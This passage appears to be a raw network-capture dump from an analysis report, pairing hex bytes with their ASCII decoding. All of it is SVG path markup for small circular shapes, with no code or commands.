                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M651.07,139.33a1.91,1.91,0,0,1-.86,2.48,2.8,2.8,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4310INData Raw: 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: 9,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4326INData Raw: 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 36 39 2c 31 32 39 2e 37 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,3.18"></path><path class="cls-7" d="M705.69,129.75a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4342INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: 69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.34,2.34,0,0,1,.17,3.17"></path><path class="cls-7" d="M740.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4358INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 33 31 2c 31 32 30 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: lass="cls-7" d="M760.31,120.18a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4374INData Raw: 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: .12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4390INData Raw: 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 39 32 2c 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22
                                                                                                                                                                                                                                                                          Data Ascii: 3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M688.92,233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4406INData Raw: 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 33 32 39 2e 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.63,0,0,1,0,3.57"></path><path class="cls-9" d="M723.35,329.6a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4422INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 38 2c 34 32 35 2e 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: ="cls-9" d="M757.78,425.4a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4694INData Raw: 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4710INData Raw: 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: 12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4726INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 34 37 2e 38 32 2c 32 31 37 2e 38 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M847.82,217.86a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4742INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 32 35 2c 33 31 33 2e 36 35 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-9" d="M882.25,313.65a2.15,2.15,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4758INData Raw: 39 22 20 64 3d 22 4d 39 31 36 2e 36 37 2c 34 30 39 2e 34 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 9" d="M916.67,409.45a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4774INData Raw: 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e
                                                                                                                                                                                                                                                                          Data Ascii: 4,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4790INData Raw: 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37
                                                                                                                                                                                                                                                                          Data Ascii: a3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67.05,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M49.77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4806INData Raw: 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                                                                                                                          Data Ascii: 1-4.23-1.19,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4839INData Raw: 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 30 2e 31 32 2c 31 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e
